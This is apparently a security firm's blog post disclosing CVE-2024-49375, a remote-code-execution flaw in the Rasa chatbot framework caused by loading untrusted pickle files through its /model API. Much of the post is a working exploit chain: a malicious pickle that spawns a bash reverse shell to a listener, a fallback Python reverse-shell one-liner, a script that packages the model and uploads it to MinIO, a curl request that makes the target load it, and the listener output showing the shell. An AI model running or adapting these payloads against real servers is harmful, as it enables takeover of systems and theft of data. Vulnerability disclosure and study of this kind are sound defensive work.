AI/ML Security · November 30, 2025 · 7 min read

When Your AI Turns Against You: Rasa RCE Vulnerability

Hakira

Introduction

In the rapidly evolving landscape of artificial intelligence and chatbot technologies, security vulnerabilities can pose significant risks to organizations worldwide. One such critical vulnerability that has garnered attention is an (un)authenticated Remote Code Execution (RCE) flaw in Rasa (CVE-2024-49375), a popular open-source conversational AI framework.

This vulnerability allows attackers to execute arbitrary code on affected systems without requiring authentication, potentially leading to complete system compromise, data breaches, and unauthorized access to sensitive information. The severity of this issue cannot be overstated, as it affects organizations that have deployed Rasa-based chatbots in production environments.

At Hakira, our commitment to identifying and mitigating security threats has led us to discover this vulnerability during one of our routine security audits for a client. Through comprehensive penetration testing and security assessments, our team identified the presence of this critical flaw in the client's AI chatbot infrastructure, enabling us to take immediate remediation steps before it could be exploited by malicious actors.

In this article, we will delve into the technical details of the Rasa (un)authenticated RCE vulnerability, explore its potential impact on organizations, discuss the discovery process during our security audit, and provide actionable recommendations for securing AI chatbot implementations against such threats.

Discovering the Vulnerability: The Journey Begins

Our security assessment began with what appeared to be a routine endpoint discovery. During our reconnaissance phase, we encountered an endpoint that responded with a simple yet revealing message: Hello from Rasa: <version>. While this might seem innocuous at first glance, it immediately caught our attention as it disclosed both the presence of a Rasa instance and its specific version number.

This discovery prompted us to dive deeper into the Rasa API documentation to understand what functionality might be exposed. What we found was particularly interesting: Rasa offers a configuration solution that enables a REST API for model management and interaction. This REST API, when enabled, provides various capabilities for managing the chatbot's behavior and underlying models.
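To illustrate this fingerprinting step, a minimal probe can be scripted. The snippet below is a sketch, not part of the original assessment tooling: it assumes a reachable instance and relies only on the root endpoint described above; the URL and timeout are placeholders.

# Illustrative fingerprinting sketch: probe the Rasa root endpoint and
# report the disclosed version string. URL and timeout are assumptions.
import requests

RASA_URL = "http://localhost:5005/"  # replace with the target base URL

resp = requests.get(RASA_URL, timeout=5)
if resp.ok and resp.text.startswith("Hello from Rasa:"):
    version = resp.text.split(":", 1)[1].strip()
    print(f"Rasa instance detected, version {version}")
else:
    print("No Rasa banner found at this endpoint")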

The Critical Endpoint: /model

As we explored the API specification further, one particular endpoint immediately drew our attention: the /model endpoint. According to the documentation, this endpoint can be used to replace the currently loaded model in the Rasa instance. This functionality, while useful for legitimate model updates and deployments, presented a potential security concern.

The significance of this endpoint became clear when we considered the nature of machine learning models in the context of security. Through our research and prior knowledge in the field, we were aware that machine learning models, particularly those serialized using certain formats, can potentially be leveraged to achieve code execution on the host system.

This realization transformed what started as a routine API exploration into a critical security investigation. If the "/model" endpoint was accessible without proper authentication, and if we could craft a malicious model that would execute arbitrary code upon loading, we would have discovered a severe Remote Code Execution vulnerability.

Setting Up the Test Environment

Rasa provides both a professional version and an open-source version. Our testing and review were conducted using the open-source version, Rasa 3.6.20. To replicate our testing environment and verify the installation, the following commands can be used to set up a dockerized version of Rasa 3.6.20:

~$ git clone https://github.com/RasaHQ/rasa.git; cd rasa; git checkout tags/3.6.20
~/rasa$ make build-docker
~/rasa$ docker volume create rasa_app; docker run --name rasa --rm -it -v rasa_app:/app -p 5005:5005/tcp rasa:localdev init --no-prompt

After executing these commands, you can verify that the Rasa bot was installed successfully by accessing the following endpoint:

curl http://localhost:5005/

This should return a response similar to "Hello from Rasa: 3.6.20", confirming that the instance is running and accessible.

Understanding the Model Generation Process

When Rasa completes its initialization process, it automatically generates and saves a trained model with output similar to: Your Rasa model is trained and saved at 'models/20250129-133851-corn-burmese.tar.gz'.

Once the containerized Rasa instance is operational, the model file can be extracted from the container to the host system for analysis using the following command:

~$ docker cp rasa:/app/models/20250129-133851-corn-burmese.tar.gz rasa-model.tar.gz
~$ mkdir rasa-model; tar -xzf rasa-model.tar.gz -C rasa-model; cd rasa-model


Examining the extracted model reveals many types of files, but one kind deserves particular attention: the .pkl files, which are Python pickle files.
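For a quick look at what these pickle files contain without actually unpickling them, Python's pickletools module can dump the opcode stream. The snippet below is an illustrative sketch; the directory layout is taken from the extracted archive above, and the choice of which file to inspect is arbitrary.

# Illustrative sketch: list the pickle files in the extracted model and
# disassemble one of them without unpickling it (pickletools only reads
# opcodes, it does not execute anything). Paths are assumptions.
import pickletools
from pathlib import Path

model_dir = Path("rasa-model")
pkl_files = sorted(model_dir.rglob("*.pkl"))
print("\n".join(str(p) for p in pkl_files))

with open(pkl_files[0], "rb") as f:
    pickletools.dis(f)  # prints the opcode stream for inspection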

Pickle Documentation

Warning: The pickle module is not secure. Only unpickle data you trust.
It is possible to construct malicious pickle data which will execute arbitrary code during unpickling. Never unpickle data that could have come from an untrusted source, or that could have been tampered with.
Consider signing data with hmac if you need to ensure that it has not been tampered with.
Safer serialization formats such as json may be more appropriate if you are processing untrusted data. See Comparison with json.
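To make the documentation's hmac suggestion concrete, here is a minimal sketch of HMAC-signed pickling, independent of Rasa; the key handling, file layout, and 32-byte SHA-256 digest framing are assumptions made purely for illustration.

# Minimal sketch of the mitigation the pickle docs suggest: sign pickled
# data with HMAC and verify the signature before unpickling. Not Rasa code;
# key management and framing here are illustrative assumptions.
import hashlib
import hmac
import pickle

SECRET_KEY = b"replace-with-a-real-secret"

def dump_signed(obj, path):
    data = pickle.dumps(obj)
    digest = hmac.new(SECRET_KEY, data, hashlib.sha256).digest()
    with open(path, "wb") as f:
        f.write(digest + data)  # 32-byte digest prepended to the payload

def load_signed(path):
    with open(path, "rb") as f:
        blob = f.read()
    digest, data = blob[:32], blob[32:]
    expected = hmac.new(SECRET_KEY, data, hashlib.sha256).digest()
    if not hmac.compare_digest(digest, expected):
        raise ValueError("pickle signature mismatch, refusing to load")
    return pickle.loads(data)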

Throughout the Rasa source code, the string .label_data.pkl appears in several locations. A closer inspection of "rasa/core/policies/ted_policy.py" reveals calls to a helper function, pickle_load (defined in rasa/utils/io.py), which opens files with this particular suffix and passes their contents to pickle.load.

~/rasa$ cat rasa/core/policies/ted_policy.py | grep .label_data.pkl -B2
        )
        rasa.utils.io.pickle_dump(
            model_path / f"{model_filename}.label_data.pkl",
--
        )
        label_data = rasa.utils.io.pickle_load(
            model_path / f"{cls._metadata_filename()}.label_data.pkl"

~/rasa$ cat rasa/utils/io.py | grep pickle_load -A9
def pickle_load(filename: Union[Text, Path]) -> Any:
    """Loads an object from a file.

    Args:
        filename: the filename to load the object from

    Returns: the loaded object
    """
    with open(filename, "rb") as f:
        return pickle.load(f)


A straightforward Proof of Concept demonstrating code execution via Python's pickle module can be created with minimal effort. As a first step, we verify whether arbitrary code execution is possible when a model file is maliciously modified. The method "TEDPolicy._load_model_utilities" is responsible for deserializing ".pkl" files, including the one ending in ".data_example.pkl", as referenced in "rasa/core/policies/ted_policy.py":

rasa/core/policies/ted_policy.py
@classmethod
def _load_model_utilities(cls, model_path: Path) -> Dict[Text, Any]:
    """Loads model's utility attributes.

    Args:
        model_path: Path where model is to be persisted.
    """
    tf_model_file = model_path / f"{cls._metadata_filename()}.tf_model"
    loaded_data = rasa.utils.io.pickle_load(
        model_path / f"{cls._metadata_filename()}.data_example.pkl"
    )

Proof of Concept: a pickle deserialization payload carrying a simple bash reverse shell

import pickle

# Command executed on unpickling: spawn a bash reverse shell back to the listener
payload = "import os;os.system(\"bash -c 'bash -i >& /dev/tcp/<LISTENER_IP>/1337 0>&1' &\")"

class EXEC:
    def __reduce__(self):
        # pickle will call exec(payload) when this object is deserialized
        return exec, (payload,)

# Overwrite the .data_example.pkl inside the extracted model with the malicious pickle
open("rasa-model/components/train_TEDPolicy3/ted_policy.data_example.pkl", "wb").write(pickle.dumps(EXEC()))

If the bash reverse shell does not work, a Python reverse shell is a reliable fallback, since Python is guaranteed to be present on any system running Rasa: python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("<LISTENER_IP>",<LISTENER_PORT>));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("sh")'

So far we have identified the vulnerable component and built a PoC exploit that yields Remote Code Execution via a reverse shell. But what about remote exploitation: how does an attacker deliver this malicious model archive to Rasa? This is where we return to the /model endpoint identified during the reconnaissance phase.

Rasa also allows specifying a remote location from which the model can be retrieved. Supported storage options include AWS, GCP, and Azure. Since we preferred not to depend on cloud providers during exploit development, we opted to use MinIO - a self-hosted, fully S3-compatible storage solution.

With everything in place, the plan for successful exploitation is: generate a manipulated model archive that demonstrates remote code execution > upload the model to our MinIO bucket > tell Rasa to fetch the malicious model via /model > enjoy the RCE. A sketch of the packaging and upload steps is shown below, followed by the request that triggers the model swap.
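The packaging and upload mechanics are glossed over in the plan above, so here is a minimal sketch assuming the tampered rasa-model/ directory from earlier and a self-hosted MinIO instance accessed through the official minio Python client; the endpoint, credentials, bucket, and object names are placeholders, not values from the actual engagement.

# Minimal sketch: repackage the tampered model directory into a .tar.gz and
# upload it to a MinIO bucket with the minio Python client. Endpoint,
# credentials, bucket, and object names are illustrative assumptions.
import tarfile
from minio import Minio

ARCHIVE = "99991231-133700-rcetest.tar.gz"

# Re-create the model archive from the modified rasa-model/ directory
with tarfile.open(ARCHIVE, "w:gz") as tar:
    tar.add("rasa-model", arcname=".")

# Upload the archive so Rasa can later fetch it from the bucket
client = Minio("<MinIO_server_location>", access_key="<ACCESS_KEY>",
               secret_key="<SECRET_KEY>", secure=False)
if not client.bucket_exists("<MinIO_bucket_name>"):
    client.make_bucket("<MinIO_bucket_name>")
client.fput_object("<MinIO_bucket_name>", ARCHIVE, ARCHIVE)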

~$ curl -s https://<TARGET>/model -X PUT -d '{"model_server": {"url": "http://<MinIO_server_location>/<MinIO_bucket_name>/99991231-133700-rcetest.tar.gz"}, "remote_storage": "aws"}'

~$ nc -vnlp 1337
Listening on 0.0.0.0 1337
Connection received on <REDACTED> 37808
rasa@<REDACTED>:~$ id
id
uid=1001(rasa) gid=0(root) groups=0(root)


After these steps we have proof that the RCE works: the reverse shell connected back to our listener.

At this stage we do have an unauthenticated RCE under certain conditions. The RCE vulnerability affects systems running Rasa as follows:
• Default configuration: not affected by RCE
• HTTP API enabled (--enable-api): affected

The vulnerable versions are:
• rasa (pip) < 3.6.21
• rasa-pro (pip) < 3.10.12, < 3.9.16, < 3.8.18
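As a rough defensive check against the open-source versions listed above, the version disclosed by the root endpoint can be compared with the patched 3.6.21 release. The sketch below assumes an open-source Rasa instance answering GET / as shown earlier; rasa-pro builds and other disclosure channels are not covered.

# Rough sketch: compare the version from "Hello from Rasa: <version>" against
# the patched open-source release (3.6.21). Assumes open-source Rasa at
# RASA_URL; rasa-pro is not covered. URL is a placeholder.
import requests
from packaging.version import Version

RASA_URL = "http://localhost:5005/"  # replace with the target base URL
PATCHED = Version("3.6.21")

banner = requests.get(RASA_URL, timeout=5).text
if banner.startswith("Hello from Rasa:"):
    version = Version(banner.split(":", 1)[1].strip())
    status = "potentially vulnerable" if version < PATCHED else "patched"
    print(f"Rasa {version}: {status} (CVE-2024-49375)")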

The vulnerability was assigned CVE-2024-49375 and carries a CVSS score of 9.0 (Critical).

https://nvd.nist.gov/vuln/detail/cve-2024-49375

Conclusion

The critical Remote Code Execution vulnerability in Rasa (CVE-2024-49375) uncovered during our recent security assessment once again highlights how a single insecure component, such as unsafe model deserialization, can escalate into a full compromise of an AI-driven platform. As organizations increasingly integrate machine learning systems into their workflows, the security of these models and their loading mechanisms becomes just as critical as traditional application security.

Our team of experts identified this issue during a recent audit, helping to strengthen the overall resilience of the ecosystem. This finding reinforces an important message: complex threats often emerge from subtle implementation details, and only systematic, in-depth security testing can uncover them before attackers do.

At Hakira, we specialize in detecting precisely these kinds of high-impact vulnerabilities: logic flaws, chained attack paths, insecure integrations, and emerging risks in AI/ML pipelines. Through comprehensive penetration testing, secure architecture reviews, and continuous security support, we help organizations prevent critical incidents before they materialize.

Securing modern platforms requires expertise, creativity, and real-world experience. Our team remains dedicated to staying ahead of evolving threats and ensuring our clients’ systems stay protected, resilient, and ready for the future.